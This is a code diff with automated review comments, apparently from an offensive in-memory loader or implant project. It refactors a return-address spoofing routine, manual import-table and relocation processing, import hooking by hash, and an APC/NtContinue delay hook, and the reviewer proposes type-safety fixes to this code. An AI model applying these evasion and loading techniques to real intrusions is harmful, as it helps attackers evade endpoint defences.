-RtlLargeIntegerAdd (
- LARGE_INTEGER Addend1,
- LARGE_INTEGER Addend2
- );
-
-__inline
-LARGE_INTEGER
-NTAPI
-RtlEnlargedIntegerMultiply (
- LONG Multiplicand,
- LONG Multiplier
- );
-
-__inline
-LARGE_INTEGER
-NTAPI
-RtlEnlargedUnsignedMultiply (
- ULONG Multiplicand,
- ULONG Multiplier
- );
-
-__inline
-ULONG
-NTAPI
-RtlEnlargedUnsignedDivide (
- IN ULARGE_INTEGER Dividend,
- IN ULONG Divisor,
- IN PULONG Remainder OPTIONAL
- );
-
-__inline
-LARGE_INTEGER
-NTAPI
-RtlLargeIntegerNegate (
- LARGE_INTEGER Subtrahend
- );
-
-__inline
-LARGE_INTEGER
-NTAPI
-RtlLargeIntegerSubtract (
- LARGE_INTEGER Minuend,
- LARGE_INTEGER Subtrahend
- );
-
-LARGE_INTEGER
-NTAPI
-RtlExtendedMagicDivide (
- LARGE_INTEGER Dividend,
- LARGE_INTEGER MagicDivisor,
- CCHAR ShiftCount
- );
-
-LARGE_INTEGER
-NTAPI
-RtlExtendedLargeIntegerDivide (
- LARGE_INTEGER Dividend,
- ULONG Divisor,
- PULONG Remainder
- );
-
LARGE_INTEGER
NTAPI
RtlLargeIntegerDivide (
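Review bot: Retyping `ApcRoutine` from `PIO_APC_ROUTINE` to plain `PVOID` in the `NtQueueApcThread` prototype removes the only compile-time check on what gets queued as an APC; it was presumably done so that `C_PTR( pApi->ntdll.NtContinue )` in src/hooks/delay.c passes under the new `-Wall -Werror`, but the cost is that any pointer now type-checks. A function-pointer typedef with the three-PVOID-argument shape the remaining parameters now describe, say `typedef VOID ( NTAPI *PAPC_ROUTINE_T )( PVOID, PVOID, PVOID );` used for `ApcRoutine`, keeps the check and still accepts the delay.c call with one explicit cast. The old `PIO_STATUS_BLOCK`/`ULONG` types for the last two slots did not match three uniform pointer-sized context arguments either, so that part of the change reads as a correction rather than a loosening; a one-line comment above the prototype saying it follows the three-context-argument form would spare the next reader from re-deriving it.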
@@ -20665,56 +20254,6 @@ RtlExtendedIntegerMultiply (
LONG Multiplier
);
-__inline
-LARGE_INTEGER
-NTAPI
-RtlConvertLongToLargeInteger (
- LONG SignedInteger
- );
-
-
-__inline
-LARGE_INTEGER
-NTAPI
-RtlConvertUlongToLargeInteger (
- ULONG UnsignedInteger
- );
-
-__inline
-LARGE_INTEGER
-NTAPI
-RtlLargeIntegerShiftLeft (
- LARGE_INTEGER LargeInteger,
- CCHAR ShiftCount
- );
-
-__inline
-LARGE_INTEGER
-NTAPI
-RtlLargeIntegerShiftRight (
- LARGE_INTEGER LargeInteger,
- CCHAR ShiftCount
- );
-
-
-__inline
-LARGE_INTEGER
-NTAPI
-RtlLargeIntegerArithmeticShift (
- LARGE_INTEGER LargeInteger,
- CCHAR ShiftCount
- );
-
-
-__inline
-BOOLEAN
-NTAPI
-RtlCheckBit (
- PRTL_BITMAP BitMapHeader,
- ULONG BitPosition
- );
-
-
BOOLEAN
NTAPI
RtlIsValidOemCharacter (
@@ -22179,7 +21718,7 @@ typedef struct _CFG_CALL_TARGET_INFO {
} CFG_CALL_TARGET_INFO, *PCFG_CALL_TARGET_INFO;
#endif
-BOOLEAN
+WINBOOL
WINAPI
SetProcessValidCallTargets(
HANDLE hProcess,
diff --git a/src/retaddr.c b/src/retaddr.c
index 62037e4..564836f 100644
--- a/src/retaddr.c
+++ b/src/retaddr.c
@@ -5,14 +5,6 @@
#include "include.h"
-
-typedef struct {
- const void* trampoline; // always JMP RBX
- void* function; // Target Function
- void* rbx; // Placeholder
-} PRM, *PPRM;
-
-
SECTION( E ) PVOID SpoofRetAddr( PVOID function, HANDLE module, ULONG size, PVOID a, PVOID b, PVOID c, PVOID d, PVOID e, PVOID f, PVOID g, PVOID h )
{
PVOID Trampoline;
@@ -23,19 +15,7 @@ SECTION( E ) PVOID SpoofRetAddr( PVOID function, HANDLE module, ULONG size, PVOI
if( Trampoline != NULL )
{
PRM param = { Trampoline, function };
- return (
- (
- PVOID( * ) (
- PVOID, PVOID, PVOID, PVOID, PPRM, PVOID, PVOID, PVOID, PVOID, PVOID
- )
- )
- (
- ( PVOID )Spoof
- )
- )
- (
- a, b, c, d, ¶m, NULL, e, f, g, h
- );
+ return Spoof( a, b, c, d, ¶m, NULL, e, f, g, h );
};
};
diff --git a/src/util.c b/src/util.c
index ca6fcc3..5269539 100644
--- a/src/util.c
+++ b/src/util.c
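Review bot: `PRM param = { Trampoline, function };` in `SpoofRetAddr` relies on positional initialisation and leaves `rbx` implicitly zero, and now that the `PRM` definition has moved to src/include.h a reader of this file can no longer see the field order; designated initialisers, `PRM param = { .trampoline = Trampoline, .function = function, .rbx = NULL };`, make the layout visible and survive a field reorder. The address of the stack-local `param` is handed to `Spoof`, so the descriptor is valid only for the duration of that call — worth a comment if the asm ever retains it. (The `¶m` on the new `return` line is `&param` mangled by the page encoding, not a change to the call.) The `Trampoline == NULL` path and the remainder of the function lie outside the hunk.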
@@ -130,14 +130,14 @@ SECTION( E ) VOID LdrProcessIat( PVOID image, PVOID directory )
for( ; Otd->u1.AddressOfData != 0 ; ++Otd, ++Ntd ) {
if( IMAGE_SNAP_BY_ORDINAL( Otd->u1.Ordinal ) ) {
if( NT_SUCCESS( Api.LdrGetProcedureAddress( Mod, NULL, IMAGE_ORDINAL( Otd->u1.Ordinal ), &Fcn ) ) ) {
- Ntd->u1.Function = Fcn;
+ Ntd->u1.Function = ( ULONGLONG )Fcn;
};
} else {
Ibn = C_PTR( U_PTR( image ) + Otd->u1.AddressOfData );
Api.RtlInitAnsiString( &Ani, C_PTR( Ibn->Name ) );
if( NT_SUCCESS( Api.LdrGetProcedureAddress( Mod, &Ani, 0, &Fcn ) ) ) {
- Ntd->u1.Function = Fcn;
+ Ntd->u1.Function = ( ULONGLONG )Fcn;
};
};
};
@@ -153,8 +153,8 @@ SECTION( E ) VOID LdrProcessRel( PVOID image, PVOID directory, PVOID imageBase )
PIMAGE_RELOC Rel = NULL;
PIMAGE_BASE_RELOCATION Ibr = NULL;
- Ibr = C_PTR( directory );
- Ofs = C_PTR( U_PTR( image ) - U_PTR( imageBase ) );
+ Ibr = ( PIMAGE_BASE_RELOCATION )( directory );
+ Ofs = U_PTR( U_PTR( image ) - U_PTR( imageBase ) );
while ( Ibr->VirtualAddress != 0 ) {
Rel = ( PIMAGE_RELOC )( Ibr + 1 );
@@ -197,7 +197,7 @@ SECTION( E ) VOID LdrHookImport( PVOID image, PVOID directory, ULONG hash, PVOID
if( Djb == hash )
{
- Ntd->u1.Function = C_PTR( function );
+ Ntd->u1.Function = ( ULONGLONG )C_PTR( function );
};
};
};
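Review bot: `Ofs = U_PTR( U_PTR( image ) - U_PTR( imageBase ) );` in `LdrProcessRel` is an unsigned subtraction that wraps whenever the mapped image sits below the preferred `ImageBase`; that is the intended two's-complement delta, but nothing says so, and with `-Wall -Werror` arriving in the same commit a later reader may "fix" it. A comment on the line, `// relocation delta; unsigned wrap is intentional, fix-ups add it modulo 2^64`, pins the intent. The `while ( Ibr->VirtualAddress != 0 )` walk that follows is bounded only by the zero terminator and never by the relocation directory's `Size`, so a malformed block runs past the directory; the loop body is outside the hunk, and since `LdrProcessRel` receives only `directory` it would need the size passed in to check it. The `LdrHookImport` (hunk @@ -197) and `LdrProcessIat` (hunk @@ -130) changes only add casts.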